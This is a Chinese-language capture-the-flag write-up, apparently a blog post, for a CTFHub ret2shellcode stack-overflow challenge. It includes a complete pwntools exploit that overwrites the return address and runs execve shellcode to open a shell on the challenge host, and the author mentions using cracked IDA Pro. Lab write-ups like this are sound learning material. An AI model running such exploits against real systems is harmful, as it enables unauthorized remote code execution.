ret2shellcode

一、栈溢出?

在栈溢出的攻击技术中通常是要控制函数的返回地址到特定位置执行自己想要执行的代码。

二、解题过程

1.开启题目,下载附件,使用file查看文件类型

在这里插入图片描述查看安全措施 CANARY/FORTIFY/NX/PIE 基本都关闭了
在这里插入图片描述

是一个64位的elf文件,添加可执行权限
在这里插入图片描述
运行一下看看,可以看到题目生成一个地址,并且需要在Input someting 后面输入payload

在这里插入图片描述

2.IDA反编译

(ps:IDA在linux环境中太难配置了,我的方法是在windows环境下,开一台虚拟机,然后在windows里下载破解版ida pro,在linux虚拟机里做题)
老规矩,放到IDA里看一下:
在这里插入图片描述在这里插入图片描述
__int64 buf; // [rsp+0h] [rbp-10h] 可以知道buf相对于rbp的偏移为0x10
所以其可用的shellcode空间为16+8=24字节(偏移量+返回地址),我们有长度为23的shellcode,但是因为其本身是有push指令的,如果我们把shellcode放在返回地址的前面,在程序leave的时候会破坏shellcode,所以我们将其放在后面,即payload的格式为:

bytes('a',encoding="utf8")*24+[buf_addr+32]+shellcode

这里的32是24字节的填充数据+返回地址

3.代码

from pwn import *

context(os="linux", arch="amd64", log_level='debug')
host = 'challenge-b5fd6fdf00912e7a.sandbox.ctfhub.com'
port = 33363

p = process('./pwn')
p = connect(host,port)
p.recvuntil(b'[')
buf_addr = int(p.recvuntil(b']')[:-1].decode('utf-8'), 16) # 获取buf地址
shellcode_address = buf_addr+0x20
p.recv() 
shell= asm(shellcraft.sh())
p.sendline( b'a'*24 + p64(shellcode_address) + shell)
p.interactive()

在这里插入图片描述


总结

基本流程是先查看文件信息,然后ida反编译,再去寻找自己所要的变量,最后构建代码。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值